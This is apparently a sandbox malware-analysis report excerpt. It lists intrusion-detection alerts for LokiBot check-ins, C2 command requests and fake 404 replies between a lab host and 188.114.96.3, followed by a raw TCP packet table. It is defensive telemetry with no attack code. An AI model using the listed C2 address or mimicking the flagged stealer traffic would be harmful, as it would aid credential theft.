2024-10-24T17:03:26.411090+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50027	TCP
2024-10-24T17:03:26.571665+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:26.571665+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:26.571665+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.670904+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.670904+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.677638+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50028	TCP
2024-10-24T17:03:29.956285+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:29.956285+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:29.956285+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:30.974836+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:30.974836+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:30.980283+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50029	TCP
2024-10-24T17:03:31.134751+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:31.134751+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:31.134751+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.097071+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.097071+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.103057+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50030	TCP
2024-10-24T17:03:32.261893+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:32.261893+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:32.261893+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.257287+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.257287+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.262858+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50031	TCP
2024-10-24T17:03:33.465689+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:33.465689+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:33.465689+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:34.907115+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:34.907115+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:34.913154+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50032	TCP
2024-10-24T17:03:35.059300+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:35.059300+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:35.059300+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.731690+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.731690+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.737558+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50033	TCP
2024-10-24T17:03:36.887347+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:36.887347+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:36.887347+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.767572+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.767572+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.773124+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50034	TCP
2024-10-24T17:03:38.921832+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:38.921832+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:38.921832+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.378665+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.378665+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.384389+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50035	TCP
2024-10-24T17:03:40.811483+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:41.729284+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50036	TCP
2024-10-24T17:03:41.883240+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:41.883240+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:41.883240+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.222325+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.222325+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.227867+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50037	TCP
2024-10-24T17:03:43.376184+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:43.376184+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:43.376184+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.266809+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.266809+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.272391+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50038	TCP
2024-10-24T17:03:44.476668+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:44.476668+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:44.476668+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:45.899764+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:45.899764+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:45.907116+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50039	TCP
2024-10-24T17:03:46.083585+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:46.083585+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:46.083585+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.447135+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.447135+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.452542+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50040	TCP
2024-10-24T17:03:49.605447+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:49.605447+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:49.605447+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.258797+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.258797+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.264591+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50041	TCP
2024-10-24T17:03:51.419744+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:51.419744+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:51.419744+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:52.944528+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:52.944528+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:52.950650+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50042	TCP
2024-10-24T17:03:53.091767+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:53.091767+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:53.091767+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.758959+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.758959+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.764327+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50043	TCP
2024-10-24T17:03:56.917338+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:56.917338+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:56.917338+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.362070+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.362070+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.367518+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50044	TCP
2024-10-24T17:03:58.513507+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:03:58.513507+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:03:58.513507+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.635176+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.635176+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.640563+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50045	TCP
2024-10-24T17:04:03.807044+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:03.807044+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:03.807044+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.695816+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.695816+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.701192+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50046	TCP
2024-10-24T17:04:04.868950+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:04.868950+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:04.868950+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.227709+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.227709+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.233149+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50047	TCP
2024-10-24T17:04:06.395715+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50048	188.114.96.3	80	TCP
2024-10-24T17:04:06.395715+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50048	188.114.96.3	80	TCP
2024-10-24T17:04:06.395715+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50048	188.114.96.3	80	TCP
2024-10-24T17:04:07.732122+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50048	188.114.96.3	80	TCP
2024-10-24T17:04:07.732122+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50048	188.114.96.3	80	TCP
2024-10-24T17:04:07.737626+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50048	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 17:02:06.720123053 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:06.725739002 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:06.725816965 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:06.727760077 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:06.733154058 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:06.733299017 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:06.738603115 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.685256958 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.687397003 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.687490940 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.691330910 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.696830988 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.817150116 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.822803974 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.822948933 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.824615955 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.830476046 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:07.830535889 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:07.835902929 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.867274046 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.867341042 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.867502928 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.867502928 CEST	49705	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.874255896 CEST	80	49705	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.918083906 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.926387072 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.926563025 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.928268909 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.934016943 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:08.934077978 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:08.939547062 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.024525881 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.024579048 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.024593115 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.024740934 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.024938107 CEST	49706	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.030313969 CEST	80	49706	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.170767069 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.177937984 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.178014040 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.179774046 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.185267925 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:10.185322046 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:10.192128897 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.080620050 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.080801964 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.083781004 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.083854914 CEST	49707	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.088433981 CEST	80	49707	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.221721888 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.228126049 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.228306055 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.230082989 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.235469103 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:11.235526085 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:11.241044998 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.208580017 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.208821058 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.210768938 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.210824966 CEST	49708	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.214200974 CEST	80	49708	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.347282887 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.353233099 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.353338003 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.355288982 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.361027002 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:12.361135006 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:12.366481066 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.386910915 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.387417078 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.390038013 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.390108109 CEST	49709	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.394165993 CEST	80	49709	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.536159992 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.541912079 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.541982889 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.543705940 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.549267054 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:13.549320936 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:13.554828882 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:16.922208071 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:16.923353910 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:16.924885988 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:16.924936056 CEST	49710	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:16.928848028 CEST	80	49710	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:17.062760115 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:17.070650101 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:17.070736885 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:17.072479010 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:17.079283953 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:17.079418898 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:17.085381985 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.447261095 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.447397947 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.448201895 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.448267937 CEST	49717	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.453089952 CEST	80	49717	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.593838930 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.600764036 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.600860119 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.602596998 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.619389057 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:20.619456053 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:20.630954027 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.532000065 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.532098055 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.534432888 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.534492016 CEST	49735	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.539726973 CEST	80	49735	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.678251028 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.683748007 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.683828115 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.685997009 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.691523075 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:21.691586971 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:21.697232962 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:22.993580103 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:22.993659019 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:22.997114897 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:22.997159004 CEST	49745	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:22.999017954 CEST	80	49745	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:23.196938038 CEST	49757	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:23.202326059 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:23.202393055 CEST	49757	80	192.168.2.5	188.114.96.3
